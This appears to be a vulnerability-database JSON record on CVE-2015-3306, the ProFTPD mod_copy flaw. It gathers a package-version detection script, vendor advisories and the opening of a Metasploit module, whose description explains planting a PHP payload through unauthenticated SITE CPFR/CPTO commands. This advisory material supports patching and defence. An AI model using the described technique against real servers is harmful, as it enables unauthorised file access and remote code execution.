reference:\"proftpd-debugsource-1.3.5a-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"proftpd-devel-1.3.5a-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"proftpd-lang-1.3.5a-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"proftpd-ldap-1.3.5a-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"proftpd-ldap-debuginfo-1.3.5a-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"proftpd-mysql-1.3.5a-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"proftpd-mysql-debuginfo-1.3.5a-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"proftpd-pgsql-1.3.5a-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"proftpd-pgsql-debuginfo-1.3.5a-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"proftpd-radius-1.3.5a-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"proftpd-radius-debuginfo-1.3.5a-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"proftpd-sqlite-1.3.5a-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"proftpd-sqlite-debuginfo-1.3.5a-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"proftpd-1.3.5a-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"proftpd-debuginfo-1.3.5a-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"proftpd-debugsource-1.3.5a-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"proftpd-devel-1.3.5a-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"proftpd-lang-1.3.5a-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"proftpd-ldap-1.3.5a-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"proftpd-ldap-debuginfo-1.3.5a-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"proftpd-mysql-1.3.5a-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"proftpd-mysql-debuginfo-1.3.5a-3.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE13.2\", reference:\"proftpd-pgsql-1.3.5a-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"proftpd-pgsql-debuginfo-1.3.5a-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"proftpd-radius-1.3.5a-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"proftpd-radius-debuginfo-1.3.5a-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"proftpd-sqlite-1.3.5a-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"proftpd-sqlite-debuginfo-1.3.5a-3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"proftpd / proftpd-debuginfo / proftpd-debugsource / proftpd-devel / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntucve": [{"lastseen": "2021-11-22T21:49:34", "description": "The mod_copy module in ProFTPD 1.3.5 allows remote attackers to read and\nwrite to arbitrary files via the site cpfr and site cpto commands.\n\n#### Bugs\n\n * <https://bugs.launchpad.net/ubuntu/+source/proftpd-dfsg/+bug/1462311>\n * <http://bugs.proftpd.org/show_bug.cgi?id=4169>\n", "cvss3": {}, "published": "2015-05-18T00:00:00", "type": "ubuntucve", "title": "CVE-2015-3306", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3306"], "modified": "2015-05-18T00:00:00", "id": 
"UB:CVE-2015-3306", "href": "https://ubuntu.com/security/CVE-2015-3306", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2021-10-21T22:57:23", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3263-1 security@debian.org\nhttp://www.debian.org/security/ Sebastien Delafond\nMay 19, 2015 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : proftpd-dfsg\nCVE ID : CVE-2015-3306\nDebian Bug : 782781\n\nVadim Melihow discovered that in proftpd-dfsg, an FTP server, the\nmod_copy module allowed unauthenticated users to copy files around on\nthe server, and possibly to execute arbitrary code.\n\nFor the oldstable distribution (wheezy), this problem has been fixed\nin version 1.3.4a-5+deb7u3.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 1.3.5-1.1+deb8u1.\n\nFor the testing distribution (stretch) and unstable distribution\n(sid), this problem has been fixed in version 1.3.5-2.\n\nWe recommend that you upgrade your proftpd-dfsg packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2015-05-19T21:46:37", "type": "debian", "title": "[SECURITY] [DSA 3263-1] proftpd-dfsg security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3306"], "modified": "2015-05-19T21:46:37", "id": "DEBIAN:DSA-3263-1:84E2C", "href": "https://lists.debian.org/debian-security-announce/2015/msg00154.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-29T01:03:39", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3263-1 security@debian.org\nhttp://www.debian.org/security/ Sebastien Delafond\nMay 19, 2015 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : proftpd-dfsg\nCVE ID : CVE-2015-3306\nDebian Bug : 782781\n\nVadim Melihow discovered that in proftpd-dfsg, an FTP server, the\nmod_copy module allowed unauthenticated users to copy files around on\nthe server, and possibly to execute arbitrary code.\n\nFor the oldstable distribution (wheezy), this problem has been fixed\nin version 1.3.4a-5+deb7u3.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 1.3.5-1.1+deb8u1.\n\nFor the testing distribution (stretch) and unstable distribution\n(sid), this problem has been fixed in version 1.3.5-2.\n\nWe recommend that you upgrade your proftpd-dfsg packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2015-05-19T21:46:37", "type": "debian", "title": "[SECURITY] [DSA 3263-1] proftpd-dfsg security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": 
"COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3306"], "modified": "2015-05-19T21:46:37", "id": "DEBIAN:DSA-3263-1:BB481", "href": "https://lists.debian.org/debian-security-announce/2015/msg00154.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "description": "ProFTPD is an enhanced FTP server with a focus toward simplicity, security, and ease of configuration. It features a very Apache-like configuration syntax, and a highly customizable server infrastructure, including support for multiple 'virtual' FTP servers, anonymous FTP, and permission-based directory visibility. This package defaults to the standalone behavior of ProFTPD, but all the needed scripts to have it run by systemd instead are included. ", "cvss3": {}, "published": "2015-05-03T17:25:10", "type": "fedora", "title": "[SECURITY] Fedora 22 Update: proftpd-1.3.5-6.fc22", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3306"], "modified": "2015-05-03T17:25:10", "id": "FEDORA:1262C6078F40", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/7YIMMJAH62SWXJPY6RVGTCS4WDFS52OU/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "description": "ProFTPD is an enhanced FTP server with a 
focus toward simplicity, security, and ease of configuration. It features a very Apache-like configuration syntax, and a highly customizable server infrastructure, including support for multiple 'virtual' FTP servers, anonymous FTP, and permission-based directory visibility. This package defaults to the standalone behavior of ProFTPD, but all the needed scripts to have it run by xinetd instead are included. ", "cvss3": {}, "published": "2015-05-10T23:49:44", "type": "fedora", "title": "[SECURITY] Fedora 21 Update: proftpd-1.3.5-5.fc21", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3306"], "modified": "2015-05-10T23:49:44", "id": "FEDORA:5B59E60582A4", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/KXGXDOA6E22YCV4EMAIY36P4RBHXZPU5/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "description": "ProFTPD is an enhanced FTP server with a focus toward simplicity, security, and ease of configuration. It features a very Apache-like configuration syntax, and a highly customizable server infrastructure, including support for multiple 'virtual' FTP servers, anonymous FTP, and permission-based directory visibility. This package defaults to the standalone behavior of ProFTPD, but all the needed scripts to have it run by xinetd instead are included. 
", "cvss3": {}, "published": "2015-05-03T17:25:18", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: proftpd-1.3.4e-3.fc20", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4359", "CVE-2015-3306"], "modified": "2015-05-03T17:25:18", "id": "FEDORA:6676A6078F43", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/ZV2IGLWVVCG3M5QHI6ULPK7EL43P52N7/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "hackerone": [{"lastseen": "2021-02-13T12:35:22", "bounty": 150.0, "description": "CVE-2015-3306 in opened to external network FTP server on files.ucs.ru", "edition": 2, "cvss3": {}, "published": "2020-11-02T11:13:12", "type": "hackerone", "title": "Mail.ru: [files.ucs.ru] ProFTPd mod_copy Arbitrary Read/Write", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3306"], "modified": "2021-02-13T12:21:10", "id": "H1:1024393", "href": "https://hackerone.com/reports/1024393", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "slackware": 
[{"lastseen": "2021-07-28T14:46:53", "description": "New proftpd packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1,\nand -current to fix a security issue.\n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n\npatches/packages/proftpd-1.3.4e-i486-1_slack14.1.txz: Upgraded.\n Patched an issue where mod_copy allowed unauthenticated copying\n of files via SITE CPFR/CPTO.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3306\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/proftpd-1.3.4e-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/proftpd-1.3.4e-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/proftpd-1.3.4e-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/proftpd-1.3.4e-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/proftpd-1.3.4e-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/proftpd-1.3.4e-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/proftpd-1.3.4e-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 
14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/proftpd-1.3.4e-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/proftpd-1.3.4e-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/proftpd-1.3.4e-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/proftpd-1.3.5-i486-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/proftpd-1.3.5-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as 
root:\n > upgradepkg proftpd-1.3.4e-i486-1_slack14.1.txz", "cvss3": {}, "published": "2015-04-22T01:24:15", "type": "slackware", "title": "[slackware-security] proftpd", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3306"], "modified": "2015-04-22T01:24:15", "id": "SSA-2015-111-12", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2015&m=slackware-security.503863", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2022-01-19T15:51:32", "description": "\n\nProFTPd development team reports:\n\nVadim Melihow reported a critical issue with proftpd\n\t installations that use the mod_copy module's SITE CPFR/SITE\n\t CPTO commands; mod_copy allows these commands to be used by\n\t *unauthenticated clients*.\n\n\n", "cvss3": {}, "published": "2015-04-15T00:00:00", "type": "freebsd", "title": "proftpd -- arbitrary code execution vulnerability with chroot", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3306"], "modified": "2015-04-15T00:00:00", "id": 
"D0034536-FF24-11E4-A072-D050996490D0", "href": "https://vuxml.freebsd.org/freebsd/d0034536-ff24-11e4-a072-d050996490d0.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "debiancve": [{"lastseen": "2022-06-11T06:01:43", "description": "The mod_copy module in ProFTPD 1.3.5 allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.", "cvss3": {}, "published": "2015-05-18T15:59:00", "type": "debiancve", "title": "CVE-2015-3306", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3306"], "modified": "2015-05-18T15:59:00", "id": "DEBIANCVE:CVE-2015-3306", "href": "https://security-tracker.debian.org/tracker/CVE-2015-3306", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-11T06:01:43", "description": "An arbitrary file copy vulnerability in mod_copy in ProFTPD up to 1.3.5b allows for remote code execution and information disclosure without authentication, a related issue to CVE-2015-3306.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-07-19T23:15:00", "type": "debiancve", "title": "CVE-2019-12815", 
"bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3306", "CVE-2019-12815"], "modified": "2019-07-19T23:15:00", "id": "DEBIANCVE:CVE-2019-12815", "href": "https://security-tracker.debian.org/tracker/CVE-2019-12815", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T16:00:29", "description": "A remote file copying vulnerability exists in ProFTPD. The vulnerability is due to a design weakness within module mod_copy. Successful exploitation would result in arbitrary code execution on target system.", "cvss3": {}, "published": "2015-04-29T00:00:00", "type": "checkpoint_advisories", "title": "ProFTPD mod_copy Unauthenticated Remote File Copying (CVE-2015-3306)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3306"], "modified": "2015-08-20T00:00:00", "id": "CPAI-2015-0510", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2016-10-03T15:01:55", "description": "Added: 05/29/2015 \nCVE: 
[CVE-2015-3306](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3306>) \nBID: [74238](<http://www.securityfocus.com/bid/74238>) \nOSVDB: [120834](<http://www.osvdb.org/120834>) \n\n\n### Background\n\n[ProFTPD](<http://www.proftpd.org/>) is free FTP Server software for Unix and Linux platforms. \n\n### Problem\n\nThe mod_copy extension, if enabled in ProFTPD, allows unauthenticated attackers to read and write arbitrary files using the `**SITE CPFR**` and `**SITE CPTO**` commands. This can lead to arbitrary command execution if the system also runs a web server supporting PHP. \n\n### Resolution\n\n[Upgrade](<ftp://ftp.proftpd.org/distrib/source/>) to ProFTPD 1.3.5a or 1.3.6rc1 or higher, or install a package update from your Linux vendor. \n\n### References\n\n<http://bugs.proftpd.org/show_bug.cgi?id=4169> \n\n\n### Limitations\n\nExploit works on ProFTPD 1.3.5 and requires the mod_copy module to be enabled. \n\nThe target must also run a web server supporting PHP in order for the exploit to succeed. \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {}, "published": "2015-05-29T00:00:00", "type": "saint", "title": "ProFTPD mod_copy command execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-3306"], "modified": "2015-05-29T00:00:00", "id": "SAINT:63FB77B9136D48259E4F0D4CDA35E957", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/proftpd_mod_copy", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-07-29T16:40:09", "description": "Added: 05/29/2015 \nCVE: [CVE-2015-3306](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3306>) \nBID: [74238](<http://www.securityfocus.com/bid/74238>) \nOSVDB: [120834](<http://www.osvdb.org/120834>) \n\n\n### Background\n\n[ProFTPD](<http://www.proftpd.org/>) is free FTP Server software for Unix and Linux platforms. 
\n\n### Problem\n\nThe mod_copy extension, if enabled in ProFTPD, allows unauthenticated attackers to read and write arbitrary files using the `**SITE CPFR**` and `**SITE CPTO**` commands. This can lead to arbitrary command execution if the system also runs a web server supporting PHP. \n\n### Resolution\n\n[Upgrade](<ftp://ftp.proftpd.org/distrib/source/>) to ProFTPD 1.3.5a or 1.3.6rc1 or higher, or install a package update from your Linux vendor. \n\n### References\n\n<http://bugs.proftpd.org/show_bug.cgi?id=4169> \n\n\n### Limitations\n\nExploit works on ProFTPD 1.3.5 and requires the mod_copy module to be enabled. \n\nThe target must also run a web server supporting PHP in order for the exploit to succeed. \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {}, "published": "2015-05-29T00:00:00", "type": "saint", "title": "ProFTPD mod_copy command execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3306"], "modified": "2015-05-29T00:00:00", "id": "SAINT:950EB68D408A40399926A4CCAD3CC62E", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/proftpd_mod_copy", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-26T11:36:43", "description": "Added: 05/29/2015 \nCVE: [CVE-2015-3306](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3306>) \nBID: [74238](<http://www.securityfocus.com/bid/74238>) \nOSVDB: [120834](<http://www.osvdb.org/120834>) \n\n\n### Background\n\n[ProFTPD](<http://www.proftpd.org/>) is free FTP Server software for 
Unix and Linux platforms. \n\n### Problem\n\nThe mod_copy extension, if enabled in ProFTPD, allows unauthenticated attackers to read and write arbitrary files using the `**SITE CPFR**` and `**SITE CPTO**` commands. This can lead to arbitrary command execution if the system also runs a web server supporting PHP. \n\n### Resolution\n\n[Upgrade](<ftp://ftp.proftpd.org/distrib/source/>) to ProFTPD 1.3.5a or 1.3.6rc1 or higher, or install a package update from your Linux vendor. \n\n### References\n\n<http://bugs.proftpd.org/show_bug.cgi?id=4169> \n\n\n### Limitations\n\nExploit works on ProFTPD 1.3.5 and requires the mod_copy module to be enabled. \n\nThe target must also run a web server supporting PHP in order for the exploit to succeed. \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {}, "published": "2015-05-29T00:00:00", "type": "saint", "title": "ProFTPD mod_copy command execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3306"], "modified": "2015-05-29T00:00:00", "id": "SAINT:FD1752E124A72FD3A26EEB9B315E8382", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/proftpd_mod_copy", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:15:53", "description": "", "cvss3": {}, "published": "2015-06-10T00:00:00", "type": "packetstorm", "title": "ProFTPD 1.3.5 Mod_Copy Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-3306"], "modified": "2015-06-10T00:00:00", "id": 
"PACKETSTORM:132218", "href": "https://packetstormsecurity.com/files/132218/ProFTPD-1.3.5-Mod_Copy-Command-Execution.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'ProFTPD 1.3.5 Mod_Copy Command Execution', \n'Description' => %q{ \nThis module exploits the SITE CPFR/CPTO commands in ProFTPD version 1.3.5. \nAny unauthenticated client can leverage these commands to copy files from any \npart of the filesystem to a chosen destination. The copy commands are executed with \nthe rights of the ProFTPD service, which by default runs under the privileges of the \n'nobody' user. By using /proc/self/cmdline to copy a PHP payload to the website \ndirectory, PHP remote code execution is made possible. 
